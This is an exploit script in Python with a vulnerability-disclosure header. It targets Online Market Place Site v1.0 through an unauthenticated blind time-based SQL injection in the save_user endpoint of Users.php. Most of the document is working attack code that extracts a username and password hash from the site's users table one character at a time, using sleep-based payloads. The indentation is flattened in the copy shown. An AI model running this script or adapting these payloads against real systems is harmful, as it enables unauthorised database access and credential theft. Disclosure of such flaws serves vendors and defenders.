# Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection
# Exploit Author: Joe Pollock
# Date: September 03, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip
# Tested on: Kali Linux, Apache, Mysql
# CVE: CVE-2022-30004 (RESERVED)
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.
# This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection.
# By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash.
# Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency.
# Ex: python3 omps.py 10.14.14.2
import sys, requests, urllib3
USERID=0
def main():
if len(sys.argv) != 2:
print("(+) usage: %s <target>") % sys.argv[0]
print('(+) eg: %s 192.168.121.103') % sys.argv[0]
sys.exit(-1)
ip = sys.argv[1]
print("(+) Retrieving username and hash...")
target = "http://%s/omps/classes/Users.php?f=save_user" % ip
# Get username
for p in range (1,30):
injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)
for c in range(32, 126):
files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}
#print(injection_string.replace("[CHAR]", str(c)))
r = requests.post(target, files=files)
if (r.elapsed.total_seconds() > 2):
extracted_char = chr(c)
sys.stdout.write(extracted_char)
sys.stdout.flush()
sys.stdout.write("\t")
# Get password hash
for p in range (1,65):
injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)
for c in range(32, 126):
files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}
#print(injection_string.replace("[CHAR]", str(c)))
r = requests.post(target, files=files)
if (r.elapsed.total_seconds() > 2):
extracted_char = chr(c)
sys.stdout.write(extracted_char)
sys.stdout.flush()
print("\n(+) done!")
if __name__ == "__main__":
main()